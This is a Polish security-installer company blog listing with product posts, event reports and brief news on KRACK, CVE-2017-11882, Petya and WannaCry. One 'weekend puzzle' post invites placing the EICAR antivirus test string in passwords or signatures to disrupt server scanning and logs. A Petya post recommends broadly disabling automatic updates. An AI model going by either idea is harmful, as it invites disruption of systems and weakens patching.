Zagadka na weekend :) EICAR-standard-AV-Test

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Mamy dla was zagadkę na weekend:) Co się stanie gdy w miejscu swojego loginu, hasła trzymanego w plain text, lub np. sygnaturze swojej poczty zastosujecie poniższy string z obrazka ? Jak myślicie co się jeszcze stanie np. z logami na serwerze gdzie ustawicie takie hasło do konta 😉 ? Dla dociekliwych obowiązkowa lektura : https://www.sec.cs.tu-bs.de/pubs/2017-asiaccs.pdf

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Telekomunikacja | Otagowany | Możliwość komentowania Zagadka na weekend :) EICAR-standard-AV-Test została wyłączona

Systemy rozpoznawania twarzy w czasie rzeczywistym

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

W ostatnich miesiącach pojawiły się doniesienia i dowody wskazujące na to, że kluczowe firmy technologiczne takie jak Amazon (ze swoją usługą Rekognition) w połączeniu z produktami firm z sektora CCTV próbowały wdrożyć dla Policji i służb coraz bardziej zaawansowane systemy rozpoznawania twarzy w czasie rzeczywistym. Systemy które mogą śledzić i identyfikować ludzi idących ulicą. Systemy które w ostatnim czasie wzbudzają szereg kontrowersji z uwagi na możliwe naruszenie ich prywatności. Wg. wstępnych informacji pierwsze takie testy przeprowadzała amerykańska Policja, i choć ogólnie wstrzymywała się z wdrożeniem, pojawiły się pierwsze sygnały na to, że jeden z wydziałów policji – Orlando, Floryda – zdecydował się wypróbować taki system w praktyce. W pisemnym oświadczeniu Departament Policji w Orlando nazwał system rozpoznawania twarzy Amazon „programem pilotażowym” i powiedział, że „będzie on używany zgodnie z obowiązującym prawem”. W oświadczeniu stwierdzono również, że wydział „nie korzysta z tej technologii w celach badawczych w jakichkolwiek miejscach publicznych” a program pilotażowy był „ograniczony tylko do 8 kamer należących do miasta” i „garstki” oficerów, którzy zgłosili się na ochotnika, a partnerstwo z Amazonem „sprawdzało, czy technologia działa.” W USA nie ma aktualnie żadnych przepisów wyraźnie zabraniających organom ścigania korzystania z rozpoznawania twarzy w czasie rzeczywistym, a konstytucyjność takich działań nie została jeszcze zweryfikowana przez sądy wyższej instancji co może stanowić poważny problem z punktu widzenia obrońców prawa do prywatności.

Na wykorzystywanie wspomnianej technologii wskazuje m.in. jeden z filmów dostępnych na YT „Image & Video Rekognition based on AWS – Ranju Das, GM of Amazon Rekognition, AWS”.

Film w którym pomiędzy 31:29 a 32:19 minutą tego filmu rzecznik Amazon Web Services (AWS) wpadł w zakłopotanie i wypowiedział się na temat wykorzystania technologii AWS przez miasto Orlando, cyt.”Miasto Orlando sprawdza wewnętrznie Amazon Rekognition Video i Amazon Kinesis Video Streams, aby znaleźć sposoby na zwiększenie bezpieczeństwa publicznego i efektywności operacyjnej, ale nie jest prawdą, że zainstalowali kamery w całym mieście lub używają ich w produkcji. Przepraszamy za wszelkie nieporozumienia.”

Ciekawi jesteśmy waszych opinii na ten temat. Czy waszym zdaniem technologia rozpoznawania twarzy w czasie rzeczywistym to naruszenie prywatności, czy konieczność dzisiejszych czasów ?

źródło : NPR (National Public Radio)

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Monitoring, Monitoring wizyjny, Systemy telewizji dozorowej | Otagowany , | Możliwość komentowania Systemy rozpoznawania twarzy w czasie rzeczywistym została wyłączona

Szkolenie z systemu sygnalizacji pożaru POLON6000 w Silver Hotel & Gokart Center w Szczecinie

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Wiedzy nigdy zbyt wiele, tym bardziej obecność obowiązkowa na szkoleniu z systemu sygnalizacji pożaru POLON6000 prowadzonym przez Pana Mariusza Radoszewskiego z firmy POLON-ALFA. Sporo cennej wiedzy przedstawionej w formie wykładów połączonych z warsztatami w trakcie których każdy miał okazję poznać bliżej możliwości najnowszej centrali. Przy okazji cenne spotkania w kuluarach z kolegami z branży i klientami, oraz wymiana doświadczeń i spostrzeżeń którymi chętnie podzielimy się również z Wami. – #POLONALFA #POLON6000

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Systemy sygnalizacji pożaru | Otagowany , | Możliwość komentowania Szkolenie z systemu sygnalizacji pożaru POLON6000 w Silver Hotel & Gokart Center w Szczecinie została wyłączona

Eliminacja nadmiaru sztucznego oświetlenia ekranów urządzeń mobilnych po zmroku

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
Eliminacja sztucznego oświetlenia, szczególnie po zmroku, i gdy dużo korzysta się z urządzeń mobilnych – brzmi pięknie, ale jak to zrobić ? Można. Genialne! https://iristech.co?ap_id=protect_eyes Polecamy.
media.giphy.com
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Systemy audio-wizualne | Możliwość komentowania Eliminacja nadmiaru sztucznego oświetlenia ekranów urządzeń mobilnych po zmroku została wyłączona

Generator mgły ochronnej XTRATUS – Najmniejszy w swojej klasie

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Generator mgły ochronnej XTRATUS – Najmniejszy w swojej klasie dostępny w specjalnej cenie od ~598 EUR
Zapraszamy do zapoznania się jego możliwościami i obejrzenia filmu prezentującego zasadę działania. https://merchant.weber.pl/product_info.php?products_id=18149

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Generatory dymu (mgły) | Otagowany | Możliwość komentowania Generator mgły ochronnej XTRATUS – Najmniejszy w swojej klasie została wyłączona

Opracowanie nt. absorbcji promieniowania EMF (poszczególnych częstotliwości) przez ciało człowieka na bazie badań nad mikrofonami bezprzewodowymi

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
Rewelacyjne (opracowana przez Swiss Federal Institute of Technology). Teraz już wiemy skąd zmiany w częstotliwościach regularnie wędrujących w górę. (Przy okazji z uwagi na częstotliwości nasuwa się analogia do telefonów komórkowych noszonych w kieszeni.)
Podsumowując : umieszczenie ciała ludzkiego między anteną nadajnika a anteną odbiornika może spowodować pogorszenie działania fal radiowych. Ciało ludzkie składa się głównie z „słonej wody”. Słona woda jest efektywnym absorberem energii RF. (Okręty podwodne muszą wynurzać się, by wysyłać sygnały radiowe FM.) Im więcej tłuszczu ma dana osoba, tym więcej promieniowania RF jest absorbowane. Opublikowane badania pokazują, że nadajnik na ciele może być od 50 do 70% mniej skuteczny niż mikrofon ręczny.
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Telekomunikacja | Otagowany , | Możliwość komentowania Opracowanie nt. absorbcji promieniowania EMF (poszczególnych częstotliwości) przez ciało człowieka na bazie badań nad mikrofonami bezprzewodowymi została wyłączona

Bardzo ciekawa lektura Case Study „School Lockdown Procedures & Systems”

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Współczesne szkoły i placówki przedszkolne to w czasach ataków i zamachów terrorystycznych miejsca coraz częściej podlegające szczególnej ochronie. Zapraszamy Was do bardzo ciekawej lektury Case Study „School Lockdown Procedures & Systems” udostępnionej przez 2N TELEKOMUNIKACE

Co myślicie o potrzebie, i sensie wdrożenia podobnych systemów w placówkach szkolnych i przedszkolnych w Polsce ? Tych którzy nie znają 2N zachęcamy do zapoznania się z naszą ofertą B2B https://merchant.weber.pl case study dostępne tutaj: https://www.2n.cz/en_GB/documents/22902/1596339/school_lockdown_system_solution_leaflet_a4_en_lq.pdf/cdbcf97f-c906-41ae-a55b-d380c98f95f5

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Kontrola dostępu | Otagowany | Możliwość komentowania Bardzo ciekawa lektura Case Study „School Lockdown Procedures & Systems” została wyłączona

Najnowsze „odkrycie” dotyczące pakietu MS Office RCE (CVE-2017-11882)

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
Uważajcie na najnowsze „odkrycie” dotyczące pakietu MS Office RCE (CVE-2017-11882), co jest w nim niesamowitego ? Choćby to że od 17 lat działa na :
– wszystkie wersje pakietu MS Office
– wszystkie wersje MS Windows
– wszystkie architektury x86/x86_64
– nie wymaga interakcji z użytkownikiem
– nie koliduje z pracą użytkownika pakiecie MS Office
…. działa praktycznie nie zauważalnie dla użytkownika ….
…. nic dodać … nic ująć…
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Telekomunikacja | Otagowany | Możliwość komentowania Najnowsze „odkrycie” dotyczące pakietu MS Office RCE (CVE-2017-11882) została wyłączona

Podatność w protokole Wi-Fi w szyfrowaniu WPA i WPA2

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
I nastał ten dzień ! Czy wszystkie stare AP i repeatery „polecą do kosza”…. ? Czy opcjonalnie zostanie jeszcze wyłożenie ścian i okien folią aluminiową… ? Jakby ktoś nie wiedział o co chodzi to 16 października 2017 r. Wydano oświadczenie Międzynarodowego Konsorcjum na rzecz Rozbudowy Cyberbezpieczeństwa w Internecie (ICASI), informujące przemysł o szeregu luk w zabezpieczeniach WPA i WPA2. Luki te znajdują się na poziomie protokołu i mają wpływ na dużą liczbę urządzeń infrastruktury bezprzewodowej i klientów bezprzewodowych, wśród wielu dostawców. Ta luka w zabezpieczeniach oznacza, że dla wrażliwych klientów i punktów dostępu zaszyfrowany ruch Wi-Fi WPA i WPA2 nie jest już bezpieczny, dopóki nie zostaną podjęte pewne kroki w celu naprawienia problemu. Strumień danych Wi-Fi, w tym hasła i dane osobowe, można przechwycić, odszyfrować i modyfikować bez wiedzy użytkownika. TADAM!! Jak kogoś interesuje źródło więcej informacji znajdziecie tutaj http://www.icasi.org/wi-fi-protected-access-wpa-vulnerabilities/ polecamy też ciekawy artykuł na https://arstechnica.com/information-technology/2017/10/severe-flaw-in-wpa2-protocol-leaves-wi-fi-traffic-open-to-eavesdropping/ Ciekawi jesteśmy też od kiedy o tym wiadomo… #KRACK #WPA2 Łatki na urządzenia klasy Enterprise są dostępne (dotyczy to m.in. urządzeń Mikrotik z RouterOS v6.39.3, v6.40.4, v6.41rc, dla WatchGuard AP120, 320, 322, 420: wydano Release 8.3.0-657
AP300: Release 2.0.0.9 o AP100, 102, 200: Release 1.2.9.14 , w przypadku urządzeń Ubiquity podatność znika w firmware 3.9.3.). Tam gdzie jest to możliwe zalecamy niezwłoczne aktualizacje. Pozostaje jednak pytanie co z milionami „tańszych” domowych i biurowych routerów ?
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Telekomunikacja | Otagowany , , , , | Możliwość komentowania Podatność w protokole Wi-Fi w szyfrowaniu WPA i WPA2 została wyłączona

BTicino AV KIT z Panelem zewnętrznym L3000 + 7′ panelem dotykowym Classe 300X 13E z obsługą WI-FI

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Mamy dla was coś nowego z oferty produktów Legrand Poland, tym razem jest to zestaw wideodomofonowy BTicino AV KIT z Panelem zewnętrznym L3000 + 7′ panelem dotykowym Classe 300X 13E z obsługą WI-FI które pozwala mu komunikować się ze smartfonem z systemem Android lub iOS. Komunikacja z urządzeniem jest możliwa przez internet dzięki dedykowanej, darmowej aplikacji, która w łatwy i intuicyjny sposób pozwala odbierać połączenia na smartfonie oraz obsługiwać inne funkcje systemu wideodomofonowego. Po sporej dawce wiedzy z dzisiejszego szkolenia możecie na nas liczyć również w zakresie pomocy przy konfiguracji czy doboru dodatkowych modułów.

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Systemy wideodomofonowe | Otagowany , , | Możliwość komentowania BTicino AV KIT z Panelem zewnętrznym L3000 + 7′ panelem dotykowym Classe 300X 13E z obsługą WI-FI została wyłączona

Apart Audio Polska Roadshow w Hotel Focus w Szczecinie

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
Dzisiejszy udział w prezentacji Apart Audio Polska Roadshow poza sporą dawką nowej wiedzy o produktach zakończyliśmy pełnym sukcesem w konkursie na „najszybszy montaż” bijąc dotychczasowy rekord z czasem 20.114 sek. Dziękujemy Apart Audio Polska za zaproszenie, super praktyczną i przydatną w codziennych branżowych zmaganiach nagrodę – dokładny miernik małych impedancji #IMPMET z serii urządzeń #must_have – dla zainteresowanych profesjonalnych instalatorów dostępny również w naszym B2B https://merchant.weber.pl/product_info.php?products_id=3634, oraz bezcenną przekazaną wiedzę. Pozdrawiamy. Osobiste pozdrowienia dla Kuby (to zaszczyt mieć takiego rywala w finale.)
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Systemy audio-wizualne | Otagowany , , , | Możliwość komentowania Apart Audio Polska Roadshow w Hotel Focus w Szczecinie została wyłączona

Centrala Callisto – Unikalna pod względem komfortu pracy instalatora centrala programowana online z aplikacji mobilnej

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 5.0/5 (2 votes cast)

W ostatnich latach przesycenie rynku systemami alarmowymi sięgnęło zenitu. Wśród szerokiej i bogatej oferty producentów systemu alarmowych można już znaleźć dosłownie wszystko; standardem stało się zarządzanie przez internet czy sms’em, obsługa urządzeń bezprzewodowych i zintegrowanie modułów gsm na płytach głównych central. Możliwości oferowanych rozwiązań są coraz większe przy wciąż relatywnie niskich cenach, ale do tego stopnia na tyle podobne, że tak naprawdę zasadniczą rolę wśród czynników wpływających na cenę zaczął poza samą technologią odgrywać design. Doszliśmy do momentu, w którym tak naprawdę ciężko czymś szczególnym wyróżnić dany produkt, i tak jak klienta końcowego łatwiej przekonać wspomnianym designem do wyboru urządzenia, tak instalatora oceniającego głównie możliwości techniczne i cenę już nie jest tak łatwo zachęcić do „czegoś nowego”.

Dlaczego o tym piszemy ? Odpowiedź kryje się za pewnym małym, czarnym i niepozornie wyglądającym elementem na poniższym zdjęciu wpiętym w płytę centrali, ale o tym za chwilę…

 

W przeciągu wielu lat pracy w branży systemów zabezpieczeń technicznych spotkaliśmy wiele rozmaitych systemów, programowanych w mniej lub bardziej zbliżony sposób, z reguły przy pomocy manipulatora lub komputera wyposażonego w odpowiedni interfejs. Obie te metody łączyło to, że jeśli cokolwiek w konfiguracji miało ulec zmianie lub modyfikacji wymagało to kontaktu z manipulatorem lub podłączenia się z systemem przy pomocy komputera. Miało to niestety pewne wady- w przypadku manipulatora instalator musiał mieć „fizyczny” kontakt z klawiaturą (nie można było pewnych ustawień zmieniać i testować stojąc w bardziej dogodnym miejscu) i zawsze istniało ryzyko że ktoś stojąc za jego plecami podejrzy np. wprowadzane kody lub identyfikatory, lub komunikaty, które niekoniecznie powinny być widoczne użytkownikowi „z ciekawości” zaglądającemu przez ramię – bo jak by nie patrzeć instalator też ma swoje „know how”, którym nie koniecznie musi chcieć się dzielić. W przypadku połączenia komputerem część z tych wad można było wyeliminować stosując moduły ethernet’owe, które są zdecydowanie wygodniejszym łącznikiem pomiędzy centralą a oprogramowaniem, ale jest to już pewien dodatkowy koszt w całej instalacji i wymaga dodatkowo przygotowanej infrastruktury. Z oczywistych względów nie ma co wspominać o połączeniu „kablowym”, które było ograniczone długością przewodu. Z punktu widzenia kogoś, kto miałby instalować systemu alarmowe, zdajemy sobie sprawę z tego, że w klasycznym instalatorstwie z uwagi na coraz niższe ceny usług coraz bardziej kluczowy staje się czas potrzebny na wykonanie i uruchomienie systemu. A co, gdybyśmy do programowania systemu mogli użyć czegoś wygodniejszego niż klawiatura manipulatora czy nie do końca poręczny laptop ? Gdyby był to np. nasz telefon i odpowiednia aplikacja, aplikacja podobna do tej którą posługuje się klient obsługując system zdalnie.

Dzięki centralom CPX200NB / Callisto (CPX200NWB) / Callisto Plus (z obsługą urządzeń bezprzewodowych) wyposażonym w klucz programatora MINI-PROG-BT stało się realne programowanie systemu z poziomu aplikacji mobilnej wyposażonej w graficzny i wygodny interfejs GUI. Nie trzeba już do tego używać wirtualnego manipulatora poruszając się po „gąszczu” rozbudowanego menu, jak miało to miejsce w przypadku systemów innych producentów. Stworzona przez producenta urządzeń firmę EBS aplikacja AVA Install poprzez szereg powiązanych z sobą zakładek i menu konfigurowalnego suwakami czy polami kontekstowymi sprawia, że po raz pierwszy można naprawdę szybko, i wygodnie skonfigurować system w trybie offline a po chwili łącząc się poprzez bluetooth z kluczem programatora przesłać lub zsynchronizować konfigurację pomiędzy naszym telefonem a centralą. To co szczególnie nam się spodobało to wygoda posługiwania się niewielkim urządzeniem jakim jest telefon, co w miejscach o ograniczonej powierzchni, lub oddalonych od manipulatora sprawia, że takie rozwiązanie staje się bardzo praktyczne i wygodne.

Dostarczony nam do testów zestaw startowy centrali CALLISTO poza przewodowym manipulatorem KP16 i wspomnianym kluczem MINI-PROG-BT wyposażony był czujniki bezprzewodowe PIR-10, bezprzewodowy kontaktron M-10, bezprzewodowy manipulator i dwa piloty RC-10, które z powodzeniem udało nam się zaprogramować do systemu z użyciem wspomnianej aplikacji.

W tym wypadku skorzystaliśmy z  funkcjonalności pozwalającej odczytywać z urządzeń (a dokładniej z nalepek w ich wnętrzu) ich identyfikatory naniesione przy użyciu znaków kodów QR  i zaimplementowanej w aplikacji AVA Install funkcji ich odczytu przy wykorzystaniu aparatu w telefonie co znacznie przyspieszyło proces parowania nowych urządzeń z konkretnymi wejściami centrali. W przypadku wejść konwencjonalnych (przewodowych) i wyjść konfiguracja również zajęła dosłownie chwilę.

Systemowi można przyporządkować dowolną ilość wejść przydzielonych do dwóch partycji. Możliwości techniczne pod względem wejść i wyjść dla wielu standardowych aplikacji są w zupełności wystarczające:

  • Wejścia:
    • 7 linii typu DEOL z możliwością programowej zamiany na EOL lub NO/NC,
    • 9 linii bezprzewodowych.
  • Wyjścia:
    • Jedno wyjście wysokoprądowe 1,1 A,
    • Dwa wyjścia niskoprądowe 50 mA.

Ostatni etap – zapis konfiguracji – i już po chwili mogliśmy testować etap naszej pracy. Jak dla nas bardzo wygodne rozwiązanie które oceniamy bardzo wysoko za pomysł, koncepcję i wykonanie.

Do aplikacji (no może poza jedną drobną niekonsekwencją w nazewnictwie której to rozgryzienie zajęło nam chwilę) absolutnie nie mamy zastrzeżeń – została zbudowana w sposób przemyślany i dość logiczny umożliwiający szybkie i sprawne poruszanie się po menu. Co do tej niekonsekwencji w nazewnictwie jeśli w starej wersji aplikacji spotkaliście się z takim oto okienkiem (przy programowaniu kodów użytkowników) to wiedzcie, że chodzi o kod administratora, a nie o serwisowy jak sugeruje napis – my już to wiemy. Czekamy na korektę w kolejnej wersji aplikacji 😉

 

 

Centrala CPX200 jest dostępna w dwóch wersjach (klasycznej konwencjonalnej i w wersji z obsługą wejść bezprzewodowych):

CPX200NB CPX220NWB
Transmisja

  • Pełne bezpieczeństwo w trakcie przesyłania danych, dzięki szyfrowaniu informacji za pomocą standardu AES,
  • Funkcja redundancji w odbiorniku EBS zapewnia niezawodność przesyłu danych – umożliwia to komunikację ze stacją monitoringu (OSM.2007),
  • Kontrola połączenia GSM/GPRS – automatyczne odzyskanie połączenia ze stacją monitoringu lub przełączenie na serwer zapasowy.
GPRS GPRS

 

SMSy do centrali TAK TAK
Wejścia przewodowe 7 7
Wejścia bezprzewodowe 9
Ilość partycji 2 2
Ilość obsługiwanych klawiatur 3 3
Zintegrowany odbiornik pilotów radiowych TAK, 9 pilotów
Sterowanie zdalne TAK, za pomocą SMS i GPRS i aplikacji AVA TAK, za pomocą SMS, GPRS i aplikacji AVA

Nie bylibyśmy jednak sobą, gdyby na zakończenie nie analiza tego rozwiązania od strony bezpieczeństwa. O ile sam system jest w naszej ocenie jest bezpieczny w użytkowaniu (wspiera szyfrowanie AES i spełnia wymagania zawarte w normie PN-EN 50131, Grade 2.), to jedyne „ale” mamy do samej technologii bluetooth wykorzystywanej przez klucz MINI-PROG-BT. Uwaga ta wynika z ostatnich doniesień o BlueBorne (potężny problem z implementacją protokołu Bluetooth w wyniku którego niektóre podatności tego protokołu zostały określone jako krytyczne – pozwalają bowiem na przejęcie kontroli nad modułem bluetooth i wykonanie na nim złośliwego kodu, czy na atak typu Man in the Middle, polegający na przechwytywaniu komunikacji Bluetooth pomiędzy urządzeniami). Problem ten dotyczy całej technologii bluetooth i dotyczy ponad 5,3 miliarda urządzeń (laptopów, smartfonów, modułów oem etc..) Reasumując gorąco polecamy duet Callisto + klucz, a klucz MINI-PROG-BT sugerujemy jednak zabierać z sobą po instalacji i nie zostawiać go wpiętego w system.

Zachęcamy Was do testowania i wyrażenia opinii. Mamy nadzieję, że taka forma programowania również przypadnie Wam do gustu. Nam spodobała się bardzo! 🙂

VN:F [1.9.22_1171]
Rating: 5.0/5 (2 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Alarmy, Systemy transmisji danych GPRS i GSM | Otagowany , , , , , , , , | 2 komentarze

Czym zastąpić szafkę RACK ? Czymś ala RACK !

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Jeśli macie bardzo wymagających klientów, oczekujących nowoczesnych rozwiązań w rewelacyjnie atrakcyjnych cenach mam coś dla was 😉 Czujemy, że od dziś będzie to hit sprzedaży naszego kanału B2B https://merchant.weber.pl Jeśli znacie inne „ciekawe” rozwiązania chętnie je poznamy 🙂 https://wiki.eth0.nl/index.php/LackRack

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Telekomunikacja | Możliwość komentowania Czym zastąpić szafkę RACK ? Czymś ala RACK ! została wyłączona

A po godzinach serwis… Dziś AXIS..

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Podstawa to lubić swoją pracę 🙂 U nas ostatnia misja na dzisiaj, i kolejny instalator uratowany z opresji, i od znacznych kosztów naprawy pogwarancyjnej w wewnętrznym serwisie producenta – nowa kamera katalogowo 10,8 tyś brutto / 1 szt., a tu mamy dwie 😉 Ostatnie testy i zamykamy biuro na dzisiaj, w końcu to już piątek – wrócimy do was w poniedziałek. Ratowania świata na dziś wystarczy, czas zacząć weekend 😉

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Systemy telewizji dozorowej | Otagowany , , | Możliwość komentowania A po godzinach serwis… Dziś AXIS.. została wyłączona

Uzupełnienie informacji z 28.06.2017 dot. ransomware Petya

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Wg. wstępnych ustaleń dot. #petya – Pacjentem „ZERO” – źródłem infekcji były stacje z zainstalowanym programem “M.E.doc” – oprogramowanie używane na UKRAINIE do rozliczeń z tamtejszym „Skarbem Państwa”.
Program, a właściwie jego podmieniona wersja zostały przesłane za pomocą osadzonych w oprogramowaniu mechanizmów automatycznej aktualizacji wczoraj ok. godz. 10:30. Wg. Microsoft’u i informacji publikowanych przez producentów programów antywirusowych, zainfekowanych zostało ponad 12 tyś. komputerów, a ślady oprogramowania znaleziono w ponad 60 krajach, w tym w Polsce (głównie
w firmach współpracujących z Ukrainą) dlatego zalecamy szczególną ostrożność w firmach posiadających kontrahentów czy partnerów handlowych z tamtego rejonu.

Równocześnie informujemy, że w przypadku klientów korzystających z dostarczanych przez nas rozwiązań i oprogramowania antywirusowego przed tą odmianą ransomware są Państwo chronieni,
jest wykrywana przez heurystykę jako HEUR:Trojan-Ransom.Win32.PetrWrap.gen Mamy już pierwsze potwierdzone przypadki ochrony przed dalszą infekcją.

Zalecamy też przyjrzeć się mechanizmom automatycznych aktualizacji w używanych przez Państwa programach i rozważenie wykonywania ręcznych (bardziej świadomych) aktualizacji w przypadku niektórych z nich. Wyobraźmy sobie analogiczną sytuację np. z programem Płatnik od Zakładu Ubezpieczeń Społecznych … używanym w niejednej firmie w Polsce, który praktycznie co chwilę pobiera i automatycznie dokonuje aktualizacji bez pytania o zgodę użytkownika. Również ten mechanizm mógłby zostać wykorzystany do ew. ataku dlatego warto rozważyć wyłączenie mechanizmów
automatycznych aktualizacji wszędzie tam gdzie nie jest to konieczne lub wskazane.

 

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Telekomunikacja | Otagowany , | Możliwość komentowania Uzupełnienie informacji z 28.06.2017 dot. ransomware Petya została wyłączona

Nowe ransomware szyfrujące dane Petya

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Nie wiemy czy już wiecie, ale  dziś bardzo mocno narozrabiało… https://www.theguardian.com/world/2017/jun/27/petya-ransomware-attack-strikes-companies-across-europe U nas i naszych klientów na szczęście jeszcze nie (choć tu wiele zależy też od ich czujności). Nie czekając do rana profilaktycznie już uszczelniamy co się da.. na dobry początek jeśli nie stosujecie żadnych autorskich zabezpieczeń i przespaliście aktualizacje (choć w tym konkretnym przypadku niewiele pomogą) warto pomyśleć o tych kilku linijkach które na pewno nie zaszkodzą.

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Telekomunikacja | Otagowany , | Możliwość komentowania Nowe ransomware szyfrujące dane Petya została wyłączona

Centrale przeciwpożarowe Bosch FPA5000

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Najnowsze centrale przeciwpożarowe Bosch FPA5000 to fascynujące technologicznie urządzenia. Tym razem była okazja żeby przyjrzeć się im trochę bliżej (od środka), od strony hardware zanim zaczniemy programować. Znacie nas już dobrze, więc zapewne was nie zdziwi, że zaczęliśmy od HARDCODED Configuration 😉 i zabaw z centralą od strony RS232. Nic nie sprawia większej frajdy i radości niż programowanie od podstaw 🙂 Serdecznie pozdrowienia dla naszych kolegów z Volty ze szczególnymi pozdrowieniami dla SAP Product Manager’a – Wojciech Dybczyński – Dziękujemy za Twój czas, przekazaną wiedzę i elastyczne podejście do naszej „nadmiernej ciekawości” 😇 – pozwoli nam to jeszcze sprawniej obsługiwać naszych klientów. #BOSCH #FPA5000

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Systemy sygnalizacji pożaru | Otagowany , , , , | Możliwość komentowania Centrale przeciwpożarowe Bosch FPA5000 została wyłączona

Przeciwpożarowy detektor iskrzenia AFDD+

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
Przeciwpożarowy detektor iskrzenia AFDD+ to element o który szczególnie warto uzupełnić instalację elektryczną w trakcie  kolejnych pomiarów ochronnych instalacji elektrycznej czy przy ew. modernizacjach. Gorąco zachęcamy do zapoznania się z tym nowym bardzo wartościowym elementem zabezpieczającym Państwa instalacje.
Przeciwpożarowy detektor iskrzenia AFDD+, 2-biegunowy [187210 AFDD+] [29214.608.18056] https://merchant.weber.pl/product_info.php?products_id=18056
Krótką prezentację działania możecie obejrzeć tutaj : https://www.facebook.com/webersystems.partner/videos/1430327143673432
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Instalacje elektryczne | Otagowany , , | Możliwość komentowania Przeciwpożarowy detektor iskrzenia AFDD+ została wyłączona

Microsoft wydaje specjalną poprawkę w związku z ransomware WannaCrypt, WanaDecrypt i WannaCry dla systemu Windows 8, XP i Windows Server 2003

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

Firma Microsoft Corp. podjęła dziś wyjątkowy krok w zakresie załatania starszych i nieobsługiwanych wersji systemu Windows – w tym Windows XP, Windows 8. Wydane patche KB4012598 mają spowolnić rozprzestrzenianie się najnowszego ransomware nazwanego WannaCrypt, WanaDecrypt i WannaCry zarażającego w błyskawicznym tempie dziesiątki tysięcy komputerów na całym świecie. Wspomniane ransomware wg. informacji z sieci powstało na bazie exploitu stworzonego na potrzeby amerykańskich służb NSA o nazwie EternalBlue, na bazie którego mogły powstać WannaCry / WanaCrypt0r 2.0. Informacja o nim jako pierwsza ujrzała światło dzienne za sprawą grupy hackerów Shadow Brokers którzy w styczniu tego roku udostępnili w sieci zestaw wykradzionych z NSA narzędzi służących do włamywania się do systemów operacyjnych (informacje a ten temat pojawiły się również na stronach WikiLeaks). Podejrzenia na EthernalBlue padają za sprawą niezależnego badacza systemów bezpieczeństwa @kafeine który na swoim profilu opublikował informację nt. związku pomiędzy regułą ET: 2024218 „ET EXPLOIT” a ETERNALBLUE załatanym w marcu 2017 przez MS17-010. Mapa śledzenia globalnego rozprzestrzeniania się tego ransomware WannaCry dostępna jest w sieci pod adresem https://intel.malwaretech.com/botnet/wcrypt

